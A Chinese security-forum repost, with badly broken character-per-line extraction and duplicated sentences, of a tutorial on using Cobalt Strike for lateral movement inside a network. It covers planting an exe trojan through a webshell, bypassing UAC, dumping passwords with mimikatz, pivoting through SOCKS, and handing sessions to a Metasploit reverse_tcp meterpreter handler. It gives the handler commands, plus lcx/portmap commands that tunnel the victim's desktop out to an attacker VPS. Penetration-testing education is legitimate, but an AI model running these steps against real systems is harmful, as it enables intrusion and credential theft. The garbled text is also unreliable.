论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[10964] 2017-01-24_Cobaltstrike在内网渗透中的使用
文档创建者:
s7ckTeam
浏览次数:
5
最后更新:
2025-01-18
渗透测试
5 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2017-01-24_Cobaltstrike在内网渗透中的使用
C
o
b
a
l
t
s
t
r
i
k
e
在
内
网
渗
透
中
的
使
用
r
j
0
0
F
r
e
e
B
u
f
2
0
1
7
-
0
1
-
2
4
上
一
篇
文
章
中
,
介
绍
了
上
一
篇
文
章
中
,
介
绍
了
C
o
b
a
l
t
s
t
r
i
k
e
发
送
钓
鱼
邮
件
的
利
用
,
但
是
发
送
钓
鱼
邮
件
的
利
用
,
但
是
C
o
b
a
l
t
s
t
r
i
k
e
不
仅
仅
是
用
在
钓
鱼
邮
件
,
同
时
也
是
一
款
非
常
强
不
仅
仅
是
用
在
钓
鱼
邮
件
,
同
时
也
是
一
款
非
常
强
大
的
内
网
渗
透
利
器
,
下
面
我
们
就
来
介
绍
一
下
如
何
利
用
其
在
内
网
中
配
合
一
些
脚
本
来
横
冲
直
撞
。
大
的
内
网
渗
透
利
器
,
下
面
我
们
就
来
介
绍
一
下
如
何
利
用
其
在
内
网
中
配
合
一
些
脚
本
来
横
冲
直
撞
。
首
先
我
们
模
拟
一
下
环
境
首
先
我
们
模
拟
一
下
环
境
首
先
我
们
模
拟
一
下
环
境
首
先
我
们
模
拟
一
下
环
境
就
是
说
,
w
e
b
服
务
器
是
一
台
内
网
主
机
,
通
过
端
口
映
射
发
布
网
站
,
而
攻
击
者
有
一
台
l
i
n
u
x
的
v
p
s
,
下
面
我
们
就
来
进
行
模
拟
内
网
渗
透
。
首
先
登
陆
我
们
的
v
p
s
,
并
把
C
o
b
a
l
t
s
t
r
i
k
e
上
传
到
该
服
务
器
。
.
/
t
e
a
m
s
e
r
v
e
r
v
p
s
_
i
p
p
a
s
s
w
o
r
d
然
后
本
地
启
动
,
启
动
的
时
候
h
o
s
t
写
v
p
s
的
i
p
。
建
立
连
接
,
连
上
以
后
我
们
还
是
同
样
的
先
建
立
l
i
s
t
e
n
e
r
,
然
后
生
成
一
个
e
x
e
的
木
马
,
这
些
在
上
一
篇
文
章
中
已
经
介
绍
,
就
不
过
多
的
说
,
然
后
我
们
把
该
e
x
e
上
传
到
w
e
b
s
h
e
l
l
中
并
执
行
,
就
发
现
在
c
l
i
e
n
t
中
已
经
上
线
。
但
是
我
们
的
权
限
并
不
是
很
高
,
仅
仅
是
一
个
w
e
b
s
e
r
v
e
r
权
限
,
常
用
的
提
权
脚
本
都
试
过
了
,
但
是
不
行
怎
么
办
=
。
=
其
实
通
过
c
o
b
a
l
t
s
t
r
i
k
e
有
可
能
实
现
提
权
,
利
用
B
y
p
a
s
s
U
A
C
(
亲
测
在
一
次
测
试
任
务
中
,
2
0
1
2
服
务
器
各
种
脚
本
上
去
无
法
提
权
,
但
是
利
用
b
y
p
a
s
s
u
a
c
成
功
拿
下
)
。
点
击
目
标
,
右
键
-
>
a
c
c
e
s
s
-
>
b
y
p
a
s
s
u
a
c
,
然
后
等
一
下
,
下
面
就
会
给
出
提
示
是
否
成
功
,
而
且
成
功
以
后
,
会
在
上
面
的
列
表
上
新
生
成
一
个
在
u
s
e
r
上
带
有
*
号
的
主
机
,
如
下
图
。
现
在
我
们
就
可
以
抓
密
码
了
,
莫
慌
,
在
c
o
b
a
l
t
s
t
r
i
k
e
也
集
成
了
m
i
m
i
k
a
t
z
,
在
a
c
c
e
s
s
-
>
r
u
n
m
i
m
i
k
a
t
z
,
然
后
就
可
以
看
到
抓
下
来
的
密
码
。
如
果
不
想
自
己
找
账
号
密
码
,
可
以
在
c
r
e
d
e
n
t
i
a
l
s
中
查
看
,
很
方
便
。
在
内
网
渗
透
中
,
在
有
s
h
e
l
l
的
机
器
上
部
署
一
个
s
o
c
k
s
,
就
可
以
利
用
本
地
的
工
具
进
行
渗
透
内
网
,
所
以
c
o
b
a
l
t
s
t
r
i
k
e
也
集
成
了
该
功
能
,
p
r
v
o
i
i
n
g
-
>
s
o
c
k
s
s
e
r
v
e
r
建
立
成
功
后
,
会
在
下
面
显
示
:
然
后
我
们
就
可
以
通
过
p
r
o
x
y
c
h
a
i
n
s
代
理
进
行
内
网
渗
透
。
当
然
,
作
为
一
款
强
大
的
协
同
工
作
平
台
+
渗
透
利
器
,
怎
么
会
没
有
一
些
常
见
的
扫
描
功
能
。
c
o
b
a
l
t
s
t
r
i
k
e
集
成
了
端
口
扫
描
,
位
置
在
e
x
p
l
o
r
e
-
>
p
o
r
t
s
c
a
n
。
默
认
扫
描
的
为
/
2
4
,
可
以
选
择
多
种
扫
描
方
式
。
我
们
还
可
以
通
过
e
x
p
l
o
r
e
-
>
n
e
t
v
i
e
w
来
进
行
内
网
存
活
主
机
探
测
。
如
果
觉
得
这
些
功
能
太
少
,
c
o
b
a
l
t
s
t
r
i
k
e
还
可
以
与
m
s
f
进
行
配
合
使
用
,
首
先
我
们
需
要
使
用
m
s
f
建
立
一
个
监
听
,
命
令
如
下
:
m
s
f
>
u
s
e
e
x
p
l
o
i
t
/
m
u
l
t
i
/
h
a
n
d
l
e
r
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
p
a
y
l
o
a
d
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
p
a
y
l
o
a
d
=
>
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
h
o
s
t
1
9
2
.
1
6
8
.
1
4
6
.
1
7
8
l
h
o
s
t
=
>
1
9
2
.
1
6
8
.
1
4
6
.
1
7
8
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
p
o
r
t
2
2
2
2
l
p
o
r
t
=
>
2
2
2
2
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
e
x
p
l
o
i
t
-
j
然
后
我
们
在
c
o
b
a
l
t
s
t
r
i
k
e
中
新
建
立
一
个
监
听
,
选
择
w
i
n
d
o
w
s
/
f
o
r
e
i
g
n
/
r
e
v
e
r
s
e
_
t
c
p
,
h
o
s
t
填
写
为
m
s
f
的
i
p
,
p
o
r
t
填
写
刚
才
设
置
的
i
p
然
后
选
择
如
下
:
选
择
刚
才
选
择
的
那
个
监
听
器
,
然
后
我
们
回
到
m
s
f
中
,
就
看
到
已
经
获
得
会
话
。
有
的
时
候
,
我
们
需
要
进
入
内
网
机
器
,
比
如
有
一
些
软
件
需
要
在
桌
面
的
环
境
下
打
开
,
或
者
一
些
管
理
员
会
在
桌
面
放
一
些
东
西
,
c
o
b
a
l
t
s
t
r
i
k
e
也
想
到
了
这
个
问
题
,
所
以
我
们
也
可
以
通
过
这
个
来
进
入
桌
面
环
境
。
在
e
x
p
l
o
r
e
-
>
d
e
s
k
t
o
p
(
v
n
c
)
点
击
等
待
就
可
以
看
到
,
但
是
也
有
一
些
问
题
,
由
于
是
h
t
t
p
传
输
,
速
度
非
常
慢
,
而
且
可
能
连
不
上
,
但
是
我
们
可
以
通
过
l
c
x
(
w
i
n
d
o
w
s
)
或
p
o
r
t
m
a
p
(
l
i
n
u
x
)
进
行
端
口
转
发
,
来
得
到
一
个
桌
面
环
境
,
这
样
是
比
较
稳
定
的
。
给
出
命
令
:
s
h
e
l
l
是
一
台
w
i
n
d
o
w
s
,
v
p
s
是
l
i
n
u
x
。
在
w
i
n
下
执
行
:
l
c
x
-
s
l
a
v
e
v
p
s
_
i
p
p
o
r
t
l
o
c
a
l
_
i
p
p
o
r
t
1
在
v
p
s
下
执
行
:
.
/
p
o
r
t
m
a
p
-
m
2
-
p
1
p
o
r
t
-
h
2
v
p
s
_
i
p
-
p
2
7
7
7
7
然
后
我
们
只
需
要
在
本
地
远
程
连
接
v
p
s
_
i
p
:
7
7
7
7
就
可
以
远
程
连
接
内
网
主
机
。
总
结
:
总
结
:
总
结
:
总
结
:
内
网
环
境
错
综
复
杂
,
但
是
毕
竟
是
内
网
,
我
们
只
要
细
心
的
研
究
它
,
就
能
拿
下
,
而
且
也
不
能
觉
得
没
做
过
就
不
做
,
什
么
都
要
尝
试
,
不
是
吗
?
*
本
文
原
创
作
者
:
r
j
0
0
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试